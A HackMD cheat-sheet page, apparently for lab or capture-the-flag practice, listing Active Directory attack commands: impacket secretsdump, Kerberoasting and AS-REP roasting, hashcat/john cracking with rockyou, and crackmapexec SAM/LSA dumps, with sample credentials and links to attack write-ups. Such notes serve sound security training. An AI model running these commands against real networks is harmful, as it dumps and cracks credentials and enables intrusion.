Try   HackMD

Windows Fundamentals

Tools

enum4linux

https://github.com/CiscoCXSecurity/enum4linux

impacket

https://github.com/SecureAuthCorp/impacket

Commands











python3 lookupsid.py 'megabank/melanie:Welcome123!@10.10.10.169'
python3 secretsdump.py 'megabank/melanie:Welcome123!@10.10.10.169'
python3 samrdump.py 'cyber/Administrator:P@ssw0rd@10.0.0.1'

python3 GetUserSPNs.py -request -dc-ip 10.0.0.1 'cyber.com/Administrator:P@ssw0rd'
hashcat -m 13100 getuserspns.txt /usr/share/wordlists/rockyou.txt --force
john -format=krb5tgs getuserspns.txt --wordlist=/usr/share/wordlists/rockyou.txt

python3 GetNPUsers.py cyber.com/ -usersfile ~/Downloads/users.txt -no-pass -dc-ip 10.0.0.1
hashcat -m 18200 getnpusers.txt -a 3 /usr/share/wordlists/rockyou.txt

NTLM Relay

https://en.hackndo.com/ntlm-relay/

Kerberos

https://en.hackndo.com/kerberos/

Mitm6

https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/

Bloodhound

https://en.hackndo.com/bloodhound/

SPN

https://en.hackndo.com/service-principal-name-spn/

AS_Rep Roasting

https://en.hackndo.com/kerberos-asrep-roasting/

Kerberoasting

https://en.hackndo.com/kerberoasting/

Pass-the-Hash

https://en.hackndo.com/pass-the-hash/

Last changed by 
CSR-Windows_Fundamentals
Windows Fundamentals
0
2
247

Read more

L5. Active Directory vulnerabilities

1. Starting point cat /etc/resolv.conf nmcli dev show eth2 nslookup -type=srv _ldap._tcp.dc._msdcs.<domain> nmap -script broadcast-dhcp-discover 2. Password stealing Crackmapexec sudo crackmapexec smb <ip> -u &apos;<user>&apos; -p &apos;<pass>&apos; --local-auth --sam sudo crackmapexec smb <ip> -u &apos;<user>&apos; -p &apos;<pass>&apos; --local-auth --lsa

Feb 7, 2021
Read more from CSR-Windows_Fundamentals
Published on HackMD